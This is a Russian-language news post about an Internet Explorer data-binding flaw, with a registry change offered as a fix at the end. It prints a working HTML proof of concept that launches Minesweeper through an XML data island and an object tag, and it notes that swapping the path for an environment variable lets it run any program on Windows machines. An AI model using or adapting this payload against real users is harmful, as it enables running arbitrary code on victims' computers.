|
Обнаружена серьёзная уязвимость в браузере IE.
Израильские специалисты по компьютерной безопасности обнаружили весьма серьезную уязвимость в браузере IE. С её помощью на удаленной машине можно запустить любую программу, причем без использования скриптов и ActiveX. Задействовать её можно с помощью следующего HTML-кода:
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span><xml id="oExec">
<security>
<exploit>
<![CDATA[<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" сodebase="c:/windows/system32/winmine.exe"></object>]]>
</exploit>
</security>
</xml>
Данный код можно скопировать в блокнот и сохранить в файл с расширением .html. Если этот файл будет открыт в IE, автоматически запустится игра САПЁР но запустить можно любую программу и команду что делает эту уязвимость просто ужасной. Если внести в код маленькие изменения и внедрить переменную в пути исполняемой программы а не использовать абсолютные пути [c:/windows/system32/winmine.exe] на исполнение команд, то запуск программ обеспечен на любых компьютерах с операционными системами Windows. Уязвимость присутствует во всех версиях IE, так как используется функция "data binding", введенная еще в IE4. [CompuLenta]
кстати говоря, работает и на моем ie6 тоже...
Лекарство:
Для запрета исполнения данного кода необходимо внести маленькие изменения в системный регистр, находим следующую ветку в регистре:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
и меняем значение для "1004" с dword:00000000 на dword:00000003
Для того чтобы внесённые изменения вступили в силу перезагрузите компьютер.
|
Новости дизайна |
Галереи |
О проекте |
RSS
Правила |
FAQ |
Поиск |
Наша команда |
Регистрация |
Вход
